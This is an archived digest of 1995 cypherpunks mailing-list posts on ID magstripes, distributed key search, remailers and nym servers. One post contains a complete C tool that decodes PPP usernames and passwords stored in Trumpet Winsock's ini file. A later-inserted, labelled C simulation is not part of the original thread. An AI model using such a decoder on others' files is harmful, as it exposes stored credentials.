To: mlist-cypherpunks@nntp-server.caltech.edu
Subject: Re: Florida Drivers Permits
In-Reply-To: <Pine.BSI.3.91.950826000630.348B-100000@usr4.primenet.com>
Message-ID: <41o1rg$hg9@gap.cco.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


Censored Girls Anonymous <carolab@censored.org> writes:

>On Sat, 26 Aug 1995, Robert A. Rosenberg wrote:

>Minnesota has now been doing this for over a year. There's been a lot of 
>trouble with it, but they have them. Mine is due any day, and it will
>certainly come in contact with a magnet, upon my possession.
California has both the digitized picture and the mag stripe, and they 
even get a digital copy of your thumbprint.
Hello, Brave New World.

(me)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sat, 26 Aug 95 21:26:15 PDT
To: CYPHERPUNKS@toad.com
Subject: SSL trouble
Message-ID: <8AFE51A.0003000395.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


DD> In conclusion, I think random searching is the way to go.  It's even better
DD> than Monty's pre-allocation with quad-coverage.

  Here's a thought: How about the best of both worlds. Keep the
double-coverage, bidirectional sweep, and allocate only one "team". The
client software will take the pre-allocated segment, and then go random
for the rest of the run.


 * GHOTI = FISH?
touGH: GH = F
wOmen: O = I
dicTIonary: TI=SH.
I love English!
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Q Mixmaster Remailer <q@c2.org>
Date: Sat, 26 Aug 95 22:57:39 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits
Message-ID: <199508270513.WAA26795@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


silly@whip.ugcs.caltech.edu ((me)) wrote:

> California has both the digitized picture and the mag stripe, and
> they even get a digital copy of your thumbprint.  Hello, Brave New
> World.

I wonder what, if anything, you could be charged with if that
magnetic strip "accidentally" came too close to a degausser?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Sat, 26 Aug 95 19:35:03 PDT
To: cypherpunks@toad.com
Subject: Re: proliferations of voicesystems
Message-ID: <199508270234.WAA07065@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


I'd have to agree with you (Ray) completely about the need for
standards for the voice internet communications software.  I 
think it would be best to draw up a standard and disseminate
it rather than wait for one to emerge out of a product.  If 
a standard is designed, it could be designed with portability
and extensions in mind, whereas if something like InternetPhone
became a de-facto standard, it would probably be more 
difficult to add upon and port to alternate platforms.

--
=================================================================
Tobin Fricke, Alias Light Ray         dr261@cleveland.freenet.edu
TobinTech Engineering                 KE6WHF Amateur Radio
The Digital Forest BBS                (714) 586-6142, 28800bps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sat, 26 Aug 95 14:58:08 PDT
To: Will French <wfrench@interport.net>
Subject: Re: SSL trouble
In-Reply-To: <199508262118.RAA15661@interport.net>
Message-ID: <"swan.cl.cam.:029190:950826215747"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>> Use integrity checks to ensure that the slaves are acting
>> properly. One method of doing this is to keep secret part of
>> the known plaintext (say 16 bits). A slave is required to
>> report _all_ matches in the range to the master. Slaves who
>> report a statistically low number of matches may be considered
>> suspicious. It is a simple matter to allocate part of that
>> keyspace to another processor for a double-check.
>  Please don't do anything like this.  This will prevent people
> like me who prefer the "random" method from participating.

You can't use the random method if the CRACK is using a sequential search.
It just doesn't fit !
You can't ACK something which has not been allocated to you.

However, if a CRACK were to be using random, the above would be useful as a
"progress report" as the rate of reports indicates how well the search is
going.
It would also allow more equal sharing out of the prize money, as on
average 2**15 "possible" keys would be found, and the first finder of each
would receive a fraction of the prize.


I don't know enough of the theory -- is there any limit as to how many
"partial" matches there could be in a single "segment" ?
(currently brure{ssl,rc4} stops on finding a match. They would have to keep
 going, and might have to return up to 2**16 partial results ??)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 26 Aug 95 20:20:53 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
In-Reply-To: <199508270132.VAA05017@interport.net>
Message-ID: <9508270319.AA26098@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



> I don't get it.  If the challenge is partly secret, how will I
>know if I crack the code?

You don't; that's how we make sure that you can't crack the code and not tell
everyone else.

The servers can be validated by using a standard bit commitment type affair.

It's a matter of principle, we should ensure that the key breaking service is not
itself subject to cryptanalytic attacks.


One small point, cryptanalysis equipment is also covered by ITAR restrictions.


		Phill
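
Added example, not part of the original thread or of any participant's code: a C simulation of the audit debated in the messages above, where a slave sees only part of the known plaintext, must report every partial match, and the master re-checks each report, compares the total with the binomial expectation and tests the withheld 16 bits itself. Assumptions made for the demonstration: `toy_block` is a hash stand-in rather than RC4 or SSL, and the 12 published bits, the segment sizes, the key value and the 4-sigma threshold are constructed values.

```c
#include <stdint.h>
#include <stdio.h>

#define PUBLISHED_BITS 12u          /* check bits handed to every slave (assumed)  */
#define WITHHELD_BITS  16u          /* check bits only the master knows ("say 16") */
#define SEGMENT_KEYS   (1u << 14)   /* keys per allocated segment (assumed)        */
#define SEGMENTS       64u          /* segments ACKed by the slave under audit     */
#define MAX_REPORTS    4096u
#define NO_KEY         UINT32_MAX

struct audit {
    unsigned reported;  /* reports that survived the master's re-check        */
    unsigned bogus;     /* reports outside the segment or not partial matches */
    int      flagged;   /* 1 if the total is more than 4 sigma below expected */
    uint32_t key;       /* first report matching the withheld bits, or NO_KEY */
};

/* Toy stand-in for "decrypt the known block under this key": the splitmix64
 * finalizer truncated to 28 bits. It is NOT RC4; it only supplies well-mixed
 * output so the match statistics behave like those of a real cipher. */
static uint32_t toy_block(uint32_t key)
{
    uint64_t z = (uint64_t)key + 0x9E3779B97F4A7C15ull;
    z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ull;
    z = (z ^ (z >> 27)) * 0x94D049BB133111EBull;
    z ^= z >> 31;
    return (uint32_t)(z & ((1u << (PUBLISHED_BITS + WITHHELD_BITS)) - 1u));
}

/* Slave: scan `count` keys from `first` and report every key whose output
 * agrees with the published bits. It cannot tell which report is the real key. */
static unsigned slave_scan(uint32_t first, uint32_t count, uint32_t published,
                           uint32_t *reports, unsigned max_reports)
{
    const uint32_t mask = (1u << PUBLISHED_BITS) - 1u;
    unsigned n = 0;
    for (uint32_t k = first; k < first + count; k++)
        if ((toy_block(k) & mask) == published && n < max_reports)
            reports[n++] = k;
    return n;
}

/* Master: allocate SEGMENTS segments to one slave that ACKs each whole segment
 * but really scans only SEGMENT_KEYS / laziness keys of it (1 = honest). */
static struct audit run_search(uint32_t true_key, uint32_t laziness)
{
    static uint32_t reports[MAX_REPORTS];
    const uint32_t pub_mask = (1u << PUBLISHED_BITS) - 1u;
    const uint32_t target = toy_block(true_key);   /* full known plaintext */
    const uint32_t published = target & pub_mask;  /* the part slaves see  */
    struct audit a = { 0, 0, 0, NO_KEY };

    if (laziness == 0)
        laziness = 1;
    for (uint32_t s = 0; s < SEGMENTS; s++) {
        uint32_t first = s * SEGMENT_KEYS;
        unsigned n = slave_scan(first, SEGMENT_KEYS / laziness, published,
                                reports, MAX_REPORTS);
        for (unsigned i = 0; i < n; i++) {
            uint32_t out = toy_block(reports[i]);
            /* Re-checking a report costs one trial, so padded reports are caught. */
            if (reports[i] - first >= SEGMENT_KEYS || (out & pub_mask) != published) {
                a.bogus++;
                continue;
            }
            a.reported++;
            if (out == target && a.key == NO_KEY)  /* withheld bits match too */
                a.key = reports[i];
        }
    }

    /* Partial matches over n keys follow Binomial(n, 2^-PUBLISHED_BITS). One
     * segment's count is weak evidence, so the audit sums over all segments. */
    double n_keys = (double)SEGMENTS * SEGMENT_KEYS;
    double p = 1.0 / (double)(1u << PUBLISHED_BITS);
    double mean = n_keys * p, var = mean * (1.0 - p);
    double deficit = mean - (double)a.reported;
    a.flagged = deficit > 0.0 && deficit * deficit > 16.0 * var;
    return a;
}

int main(void)
{
    /* Constructed key: it lies past the first quarter of segment 0, so a
     * slave that scans only a quarter of each segment never tries it. */
    const uint32_t true_key = 12345u;
    struct audit honest = run_search(true_key, 1);
    struct audit lazy = run_search(true_key, 4);

    printf("honest: reported=%u bogus=%u flagged=%d key=%lu\n", honest.reported,
           honest.bogus, honest.flagged, (unsigned long)honest.key);
    printf("lazy:   reported=%u bogus=%u flagged=%d key=%lu\n", lazy.reported,
           lazy.bogus, lazy.flagged, (unsigned long)lazy.key);
    return 0;
}
```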



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Sat, 26 Aug 95 23:21:23 PDT
To: q@c2.org
Subject: Re: Florida Drivers Permits
In-Reply-To: <199508270513.WAA26795@infinity.c2.org>
Message-ID: <199508270620.XAA16117@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Q" == Q Mixmaster Remailer <q@c2.org> writes:

    > silly@whip.ugcs.caltech.edu ((me)) wrote:
    >> California has both the digitized picture and the mag stripe,
    >> and they even get a digital copy of your thumbprint.  Hello,
    >> Brave New World.

    > I wonder what, if anything, you could be charged with if that
    > magnetic strip "accidentally" came too close to a degausser?

Not much...(!)  People who don't have the strip at all aren't breaking
any laws, and they aren't required to get strips added.  It's just
that the DMV won't give out new cards that don't have the strip.

Presumably just like the post office and zip codes: you don't *need*
it, but it speeds things up if you've got it.

- -sq


-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: White Adept <adept@minerva.cis.yale.edu>
Date: Sat, 26 Aug 95 21:14:07 PDT
To: Markku-Juhani Saarinen <marks@evitech.fi>
Subject: Re: Eudora/Trumpet encryption (stupid, solved here)
In-Reply-To: <Pine.3.89.9508191650.A25524-0100000@evitech.evitech.fi>
Message-ID: <Pine.SOL.3.91.950827001240.28053A-200000@minerva>
MIME-Version: 1.0
Content-Type: text/plain

On Sat, 19 Aug 1995, Markku-Juhani Saarinen wrote:

> 
> On Wed, 16 Aug 1995, Sean A. Walberg wrote:
> 
> > I'm a crypto newbie here, but does anybody know how Trumpet Winsock 
> > and/or Eudora encrypt the passwords in their .ini files?  I am trying to 
> > write a front end for a client and would rather it set up automatically 
> > rather than the program ask.
> > 
> 
> It's not xor. It's wrap-around addition. Not much better than rot-13 :) I 
> broke it for my friend just a couple of days back, but it seems like he 
> has deleted the source I wrote at his place (cryptanalysis and writing the 
> 4-line c-source took about 20 minutes, total). Besides the key (the one 
> used in encryption of the password) may be different in different 

Four-line C source?  I'm impressed.  I've enclosed a bit longer C-source 
that does the same.

> versions and licences of these programs.
> 
> Here's what you'll have to do to get the built-in key:
> 
> 1. set password to 00000000, for example, and see what it encrypts into.
> 2. now subtract 0x30 (ascii 0) from every character of the encrypted 
>    password. congratulations, you have the key! :)
> 
> Now you can pretty much figure out how to decrypt any password.
> 
> Note:
> Encrypted characters are in the range 32..127. First perform a logical
> and with 0x7f. If the result is smaller than 32, add 32.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  


/*This was written to deal with trumpet winsock's 'encryption' by
  spitting out the ppp-username and ppp-password values.

  This was written by: Ben Samman <samman@cs.yale.edu>.

  The algorithm is very simple and a simple inspection of this file should
  be sufficient for most people to figure out what's going on.

  Feel free to copy this as you please, as long as you include this
  message with it.

  If you use this, please send me mail and tell me what it's used
  for--I'd be somewhat curious.

  If there are any questions, feel free to mail me and ask me.

  USAGE:
  trmpbrk <base> <pass>

  Definitions:

  BASE:
  Base is a trumpwsk.ini file in which you have inputted "000000000000" into
  the ppp-username box in the File/PPP Options/Username menu in Trumpet
  Winsock.  Don't forget to rename this to something other than
  trumpwsk.ini (something like "0")

  I've included my copy of base, but every version/revision of
  Trumpet Winsock changes it, so I would recommend you do this yourself.

  PASS:
  This is the file that you want to decrypt the value for.  Most of the time
  it will be trumpwsk.ini.

  Example:

  trmpbrk 0 trumpwsk.ini

  (c)Ben Samman  <samman@cs.yale.edu>
  */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*Read forward in fp until line[] holds an entry starting with name;
  exit with an error if the file ends first*/
static void find_entry(FILE *fp, char *line, int size, const char *name)
{
  while (fgets(line, size, fp)!=NULL)
    if (strncmp(line, name, strlen(name))==0)
      return;
  fprintf(stderr, "Error: no %s entry found\n", name);
  exit(1);
}

int main(int argc, char **argv)
{
  size_t i;
  char line[256];
  /*username[] holds the key recovered from the base file, username_2[]
    the decoded value; both are reused for the password*/
  unsigned char username[256]={0}, username_2[256];
  FILE *BASE, *PASS;

  printf("TRMPBRK.EXE for finding PPP passwords from TRUMPWSK.INI\n");
  printf("By: Ben Samman <samman@cs.yale.edu>\n");
  printf("Copyright 1995\n");
  printf("\n\n");

  /*First test for number of arguments*/
  if (argc!=3)
    {
      fprintf(stderr, "Error: Too few arguments\n");
      fprintf(stderr, "Usage:\t%s <base> <password_file>\n", argv[0]);
      exit(1);
    }

  BASE=fopen(argv[1], "r");
  PASS=fopen(argv[2], "r");
  if (BASE==NULL || PASS==NULL)
    {
      fprintf(stderr, "Error: cannot open input files\n");
      exit(1);
    }

  /*Key = encrypted "0000..." minus ASCII '0'.  The value starts at
    column 14; i+3<strlen(line) is i<strlen(line)-3 without underflow*/
  find_entry(BASE, line, sizeof line, "ppp-username");
  for (i=14;i+3<strlen(line);i++)
    {
      username[i-14]=line[i]-'0';
    }
  username[i-14]=0;

  /*Subtract the key and fold the result back into printable ASCII*/
  find_entry(PASS, line, sizeof line, "ppp-username");
  for (i=14;i+3<strlen(line);i++)
    {
      username_2[i-14]=line[i]-username[i-14];
      username_2[i-14]=(((username_2[i-14])%128)+(96*(username_2[i-14]<32)));
    }
  username_2[i-14]=0;

  printf("PPP Username: %s\n", (char *)username_2);

  /*Same two steps for the password entry*/
  find_entry(BASE, line, sizeof line, "ppp-password");
  for (i=14;i+3<strlen(line);i++)
    {
      username[i-14]=line[i]-'0';
    }
  username[i-14]=0;

  find_entry(PASS, line, sizeof line, "ppp-password");
  for (i=14;i+3<strlen(line);i++)
    {
      username_2[i-14]=line[i]-username[i-14];
      username_2[i-14]=(((username_2[i-14])%128)+(96*(username_2[i-14]<32)));
    }
  username_2[i-14]=0;

  printf("PPP Password: %s\n", (char *)username_2);

  fclose(BASE);
  fclose(PASS);
  return 0;
}










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Sat, 26 Aug 95 21:35:56 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508270432.AAA20728@interport.net>
MIME-Version: 1.0
Content-Type: text/plain


>>   I don't get it.  If the challenge is partly secret, how
>> will I know if I crack the code?

> You don't; that's how we make sure that you can't crack the code
> and not tell everyone else.

  Why would I want to do such a thing?  And if I did, why would
anyone care?

> It's a matter of principle, we should ensure that the key
> breaking service is not itself subject to cryptanalytic
> attacks.

  Absolutely.  And the simplest way to do that is to use the
random method!

>   One small point, cryptanalysis equipment is also covered by
> ITAR restrictions.

  What is the significance of this rather ominous warning?


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Q Mixmaster Remailer <q@c2.org>
Date: Sun, 27 Aug 95 01:51:02 PDT
To: mix-l@jpunix.com.cypherpunks@toad.com
Subject: Mixmaster Questions
Message-ID: <199508270823.BAA07092@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Is there an automated way I can keep my PUBRING.MIX and TYPE2.LIST
files updated automatically?  (I'd prefer to be able to "finger"
them from somewhere and redirect the results into a file.)  Also,
does anyone do a periodic "ping" of Mixmaster remailers to make sure
they're up and running?  I only run Mixmaster as a client, and not
as a remailer, and I'd like a way to make sure I don't send a
message to the bitbucket by accidentally chaining it through a
"dead" remailer.

Also, what is the latest version of Mixmaster?

Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 27 Aug 95 01:38:11 PDT
To: cypherpunks@toad.com
Subject: nym server development mailing list
Message-ID: <199508270829.BAA15699@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message

To: Remailer-Operators@c2.org
From: Bryan Strawser <feanor@anduin.gondolin.org>
Subject: Nym Server Development....
Date: Fri, 11 Aug 1995 21:04:22 -0500 (EST)

John Fleming, along with a bit of support help from myself, is developing
a nym server that he is intending to release to the public once we are
satisfied with the performance and the state of the code.

At this point in time, John has pushed the code to the point where we
have an experimental nym server operating that is being constantly
refined and features added. Along the same lines, I am presently
working on solid documentation for when the nymserver is ready for
public use, and for the later public release of the code.

John created a mailing list for those interested in contributing to the
development of his nymserver and as a forum for discussion of nymserver
related issues.  So far, there have been few folks subscribed, and no
answer from those that are presently subscribed to the list.  I find
this rather disappointing.

This is your chance to get involved in developing this server.  There has
been a lot of interest expressed in nymservers on this list previously,
as well as from other folks that presently use the type I and II remailers
that are running today.  Just like the other types of anonymity out
there, a nymserver has many viable reasons for existence.  The lack of
publicly available code for such a server, as there is for remailers,
should motivate us to get behind John and his efforts.

To subscribe to the nymserver development & discussion forum, send
a message to majordomo@sephiroth.org with the line "subscribe nyms
<your name>" in the body of the message.  Questions about the
nymserver should be directed to that list so that all can be involved
in the development.

Thanks for your input,

Bryan



- -- 
Bryan Strawser, Gondolin Technologies, Bloomington, IN USA        Remember Waco
feanor@gondolin.org                                            Live free or die

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NCSA HTTPd <www@www.sierra.com>
Date: Sun, 27 Aug 95 02:05:30 PDT
To: cypherpunks@toad.com
Subject: Sierra On-Line Authentication Key
Message-ID: <199508270906.CAA22203@www.sierra.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome cypherpunks to SierraWeb.  We are pleased to present you with the key to our 
magical kingdom in the form of a verification key.  Your Sierra Web 
verification key is... 

humane-tomato   

Be sure and make a note of it! 
The next time you log in and are prompted for it, type in your verification key.
Remember, your verification key is not your password.  Your password is 
the word you chose when registering.

 Use the following URL to verify your membership:

 http://www.sierra.com/authenticate.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NCSA HTTPd <www@www.sierra.com>
Date: Sun, 27 Aug 95 02:05:29 PDT
To: cypherpunks@toad.com
Subject: Sierra On-Line FAQ
Message-ID: <199508270906.CAA22206@www.sierra.com>
MIME-Version: 1.0
Content-Type: text/plain


(Following is a FAQ for the SierraWeb Welcome Kit)

Welcome to SIERRAWEB

Here is some helpful information which we hope can answer a range
of  possible  questions.  At  Sierra On-line, we want to make all
your visits to our web site most enjoyable.

SIERRAWEB FAQ (Frequently Asked Questions)

Q: How do I log on to the Sierra On-line web site?

A: The SierraWeb address on the World Wide Web is

                                        http://www.sierra.com/

Since this document was most likely sent to you along  with  your
password  verification then you've already signed on to SierraWeb
once.


Q: What do I do with the verification code-words you e-mailed  to
me?

A:  Log back on to SierraWeb by typing our address  in  your  web
browser.  Then,  after  typing in your name and password, type in
the Verification Code-Word and you'll be  officially  registered.
This  is  the  only time you'll have to type in your Verification
Code unless you re-register again.

Q: Why does SierraWeb use a password and verification code-word?

A: We ask for your name and email address to confirm the uniqueness
of every member.  It allows us to a.) customize the service for each
individual member's preferences and b.) help us better understand
the demographic profile of our membership and c.) prevent abuse of
the website such as unauthorized orders or the use of offensive
language.  All in all, we want to get to know you as an individual.

Q: What if I forget my password?

A: At SierraWeb, you choose your own password so we hope it  will
be  easy  to remember.  If you forget it, then you'll need to re-
register and pick a new one.

Q: How do I change the look and links of my personal User Page?

A: Just one of the things that makes SierraWeb unique is that it
allows you to change the way you view much of the information that
is available.  Special 'looks' will change the web control page bars
at the top and bottom of the page as well as the page background.
(Can't view backgrounds on your browser :^( , you can still change
your control bars.) For instance, you can choose an Arcade 'look' by
choosing 'Arcade' from the pop-up menu at the bottom right of your
SierraWeb Personal Page.  If you're interested in Football or
Baseball, you might select the 'Box Seats' look. Do you like outer
space and science fiction? Try out the Space Command look.  Here's a
chart to help you choose the look or looks that you might like:

If you like...				You might try...

Adventure games like			Myth and Magic
King's Quest

Mother Goose or Playtoons		'Family Fun'

Comedy like Space Quest or		'Comedy'
Leisure Suit Larry or
Woodruff & the Schnibble

Children's Learning			'Kid Smarts'

Reality Role Playing			'9-1-1'

Action/Arcade				'Arcade'

Air/Sea Battle Simulations	       	'Combat'

Football/Baseball		        'Sports Fan'

Horror/Mystery/Suspense		        'Frightful'
						

...and more!  Plus you can choose from a selection of pure colored backgrounds

Q: What does the LINK change do?

A: Along with changing your 'look' on SierraWeb, you can also change
your 'Link.' A 'link' is a direct click-jump to a Sierra game
category (also called genre).  There are a number of categories of
games at Sierra.  Here is a brief list.

ACTION
ADVENTURE
COMEDY
KIDS
EDUCATION
FAMILY
SIMULATION
SPORTS
...and more!

To create a link directly to a category, select  the  'Link'  you
want  to  jump to and click on the change button.  The new 'Link'
you select will appear in the Link window.

Q:   Back to the 'looks,' I noticed that I have a choice  between
a full page's background and a GIF tile.  What's the difference?

A: The full page background is a page  backdrop  from  an  actual
Sierra  game.  Since these files are generally around 30K in size
you'll either need to have a fast modem, say 14,400 or 28,800  or
some patience.  (They're worth waiting for!).  If you are using a
slower modem, or would like a change of  pace,  choose  the  tile
looks.   These files load much quicker since they are quite a bit
smaller in size.

Q: I can't see any backgrounds on my page.

A: Some browsers  are  not  yet  compliant  with  the  background
feature.   You  may wish to change your browser to one that meets
the HTML 2.0 standards.

Q: I can't see the whole page?

A: The standard width size for most pages on  our  website  is  9
inches  and  you should adjust the size of your browser window to
that width.

Q: I see a mailbox on my personal page and the  words  'YOU  HAVE
MAIL!'?  What is this?

A: From time to time, Sierra will be informing members with  news
about our company products and people.  If you see the words 'YOU
HAVE MAIL!,' click on the mailbox to read your mail  from  Sierra
HQ.

Q: How do I send mail to Sierra?

A: To reach Sierra On-line with a Technical Support question, go to
the Help Center which is reachable by clicking the 'Help Center' icon
on the bottom control bar (the one with the ? over the globe).  You
can also make Customer Service inquiries from the Help Center.




Note: Some links may not be suitable for youngsters under the age
of 13 and may be automatically deactivated.

Q: How do I use the SEARCH feature?  

A: You'll find a SierraWeb SEARCH button in the upper left hand
corner of most SierraWeb pages.  Click on it and you will be
presented with a Word Search Box ready for you to type in the word
or words you are interested in locating on other pages.  For
instance, if you are interested in football, simply type in:
football.  If you are interested in Space, type in: Space.  By
typing space you might be directed to the Space Quest series games
or to a space game like Outpost.

Q: How do I find my way back to my Personal Page?

A: Just click on the HOME button underneath the  Sierra  logo  in
the  upper  right  hand corner of most pages on SierraWeb and you
will be automatically transported  back  HOME  to  your  Personal
Page.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: White Adept <adept@minerva.cis.yale.edu>
Date: Sat, 26 Aug 95 23:18:45 PDT
To: Q Mixmaster Remailer <q@c2.org>
Subject: Re: Florida Drivers Permits
In-Reply-To: <199508270513.WAA26795@infinity.c2.org>
Message-ID: <Pine.SOL.3.91.950827021008.2166E-100000@minerva>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 26 Aug 1995, Q Mixmaster Remailer wrote:

> silly@whip.ugcs.caltech.edu ((me)) wrote:
> 
> > California has both the digitized picture and the mag stripe, and
> > they even get a digital copy of your thumbprint.  Hello, Brave New
> > World.
> 
> I wonder what, if anything, you could be charged with if that
> magnetic strip "accidentally" came too close to a degausser?

Why bother to degauss it--why not just let it "rest" too long on those 
demagnetizing pads they use at department stores and libraries to 
demagnetize the security strips?

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Sat, 26 Aug 95 23:26:32 PDT
To: cypherpunks@toad.com
Subject: Greetings
Message-ID: <199508270626.CAA00589@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Greetings, everyone.  I just discovered this list a few days ago
and have been monitoring since then.  It's pretty interesting.
I'd like to get involved.  I'm very interested in cryptography
and mathematics, but I have very little cryptographic experience.
(hm. Is there a Cypherpunks FAQ?) From the conversation that's
going on, I am led to believe that Cypherpunks is setting up
a distributed system to break some cryptographic system or 
factor a large number.  I would expect that a constant net
connection would be a requirement to participate in such an
interesting event.  In any case, I have a 486DX-50 running
Linux and I'm interested and curious and willing to learn
and help in any way I can.

--
=================================================================
Tobin Fricke, Alias Light Ray         dr261@cleveland.freenet.edu
TobinTech Engineering                 KE6WHF Amateur Radio
The Digital Forest BBS                (714) 586-6142, 28800bps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Sat, 26 Aug 95 23:37:31 PDT
To: cypherpunks@toad.com
Subject: Demagnetizing
Message-ID: <199508270637.CAA03863@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


> demagnetizing pads they use at department stores and libraries

How exactly does that system work?  They can't instantly 
demagnetize something with a quick tap on a pad, can they? Also,
what are they demagnetizing?  Is it a strip embedded in the spine
of the book, or is it just in a sticker on the outside? For
instance, how do they do it to magazines (or do they? they
go through the process with magazines, too, or is that just
because they don't know better?)?

--
=================================================================
Tobin Fricke, Alias Light Ray         dr261@cleveland.freenet.edu
TobinTech Engineering                 KE6WHF Amateur Radio
The Digital Forest BBS                (714) 586-6142, 28800bps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Sun, 27 Aug 95 00:45:12 PDT
To: cypherpunks@toad.com
Subject: Re: Demagnetizing
Message-ID: <199508270744.DAA15929@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Where exactly is the r/c circuit?  Is it very small and in
a label?  Book publishers don't put them in, do they?  
Also, if the thing gets "burned out" by the magnet in the
pad, what do libraries and such do where materials are
reused?  Just slap on another label thing?  

--
=================================================================
Tobin Fricke, Alias Light Ray         dr261@cleveland.freenet.edu
TobinTech Engineering                 KE6WHF Amateur Radio
The Digital Forest BBS                (714) 586-6142, 28800bps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Sun, 27 Aug 95 00:48:53 PDT
To: cypherpunks@toad.com
Subject: Re: Greetings
Message-ID: <199508270748.DAA16297@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Ah.  By address space, you mean a set of possible keys, right?
Is there specific software we use to test this 'address space,'
or do we come up with our own?   It seems that there ought to 
be a more exotic method other than a brute force attack.  I
don't know much about cryptography, but if there's a way to
get "feedback" as to how "close" a key is to the real key, then
some sort of genetic algorithm could be devised.  Actually, 
perhaps not, since there are no "genes" involved, just a 
big number.  Hm.

--
=================================================================
Tobin Fricke, Alias Light Ray         dr261@cleveland.freenet.edu
TobinTech Engineering                 KE6WHF Amateur Radio
The Digital Forest BBS                (714) 586-6142, 28800bps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Man In Black <mib@davinci.netaxis.com>
Date: Sun, 27 Aug 95 01:18:55 PDT
To: Tobin T Fricke <dr261@cleveland.Freenet.Edu>
Subject: Re: Demagnetizing
In-Reply-To: <199508270637.CAA03863@kanga.INS.CWRU.Edu>
Message-ID: <Pine.SOL.3.91.950827041448.24279A-100000@davinci.netaxis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 27 Aug 1995, Tobin T Fricke wrote:

> How exactly does that system work?  They can't instantly 
> demagnetize something with a quick tap on a pad, can they? Also,
> what are they demagnetizing?  Is it a strip embedded in the spine
> of the book, or is it just in a sticker on the outside? For
> instance, how do they do it to magazines (or do they? they
> go through the process with magazines, too, or is that just
> because they don't know better?)?

The way the system works at my local library is that there _is_ a strip 
embedded in the spine and it isn't demagnetized by a quick tap but by rubbing 
it several times over a demagnetizer (there's a big sticker on the side 
that says not to leave any magnetic storage media near it).   As far as 
magazines go, my library simply doesn't let people borrow them (which 
means if it ain't there, it's stolen).  Anyone know how they protect 
against magazine theft (okay, no crypto relevance.  reply to me and not 
the list, then).  Later.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
Comment: There is no such thing as electronic privacy.

-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sat, 26 Aug 95 18:21:39 PDT
To: rjc@clark.net
Subject: Re: proliferation of voicesystems
In-Reply-To: <199508262330.TAA08738@clark.net>
Message-ID: <199508270121.EAA24196@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


